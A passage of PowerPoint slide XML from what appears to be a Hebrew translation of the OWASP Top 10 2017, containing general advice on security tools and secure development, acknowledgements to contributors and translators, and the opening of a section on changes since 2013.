                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השתמש בכלים בתבונה.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> פגיעויות אבטחה עשויות להיות מאוד מורכבות וחבויות עמוק בתוך הקוד. במקרים רבים, הגישה שנותנת הכי הרבה עלות-תועלת למציאת והסרה פגיעויות אלו הינה להיעזר במומחה אנושי המצויד בכלים מתקדמים. הסתמכות על כלים בלבד מייצרת תחושה שגויה של ביטחון ואינה מומלצת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>דחוף לכל הכיוונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. התמקד בהטמעת עקרונות אבטחה כחלק מובנה בתהליכי הפיתוח בארגון. למידע נוסף, עיין ב</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>מודל למדידת רמת הבגרות של תהליך הפיתוח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3121645480"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3383995" y="3311860"/>
          <a:ext cx="3429000" cy="5328377"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334903">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שיוך</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4993097">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו מעוניינים להודות לארגונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אשר תרמו מידע לגבי פגיעויות אבטחה על-מנת לתמוך בגרסת 2017 של מסמך זה. קיבלנו מעל 40 תגובות כאשר ביקשנו מידע נוסף. לראשונה, כל המידע אשר תרם לגרסה זו של ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ולרשימה המלאה של התורמים זמינה בצורה חופשית. אנו מאמינים כי מדובר באוסף הגדול והמגוון ביותר אודות פגיעויות אבטחה אשר נאסף בצורה פומבית עד כה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בשל העובדה שקיימים יותר תורמים מאשר ניתן להכיל במסמך זה, יצרנו </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>עמוד ייעודי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>על-מנת להודות לכל התרומה שנעשתה. אנו מעוניינים להודות מקרב לב לאותם ארגונים על שהיו מוכנים לשתף באופן פומבי מידע אודות פגיעויות אבטחה בעקבות מאמציהם. אנו מקווים כי הנושא ימשיך להתרחב ולעודד ארגונים נוספים לעשות זאת גם כן ולהיראות כאבני דרך מהותיות כהוכחה לאבטחה. מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לא היה אפשרי ללא העזרה המדהימה של התורמים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תודה גדולה ליותר מ-500 אנשים על הזמן שהשקיעו למלא סקרים. הקול שלכם סייע להחליט לגבי שתי תוספות לרשימת ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. ההערות הנוספות, רשמי העידוד והביקורת התקבלו בברכה. אנו יודעים כמה הזמן שלכם יקר ועל כך אנו מודים לכם.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו מעוניינים להודות לאותם אנשים אשר תרמו הערות מהותיות וזמן על-מנת לעבור ולעדכן את רשימת ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. ככל הניתן, ציינו את שמם </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>בעמוד התודות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>לסיום, אנו מעוניינים להודות מראש</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לכל המתרגמים, אשר יתרגמו עותק זה של ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> למספר רב של שפות, ומסייעים להפוך את מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> נגיש לכולם.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    מבוא</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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le 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336421558"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8151509"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>מה השתנה מ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2013 ל</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2017?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7816229">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שינויים מהירים התרחשו בארבע השנים האחרונות,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ומסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> נדרש להשתנות בהתאם. שכתבנו את מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
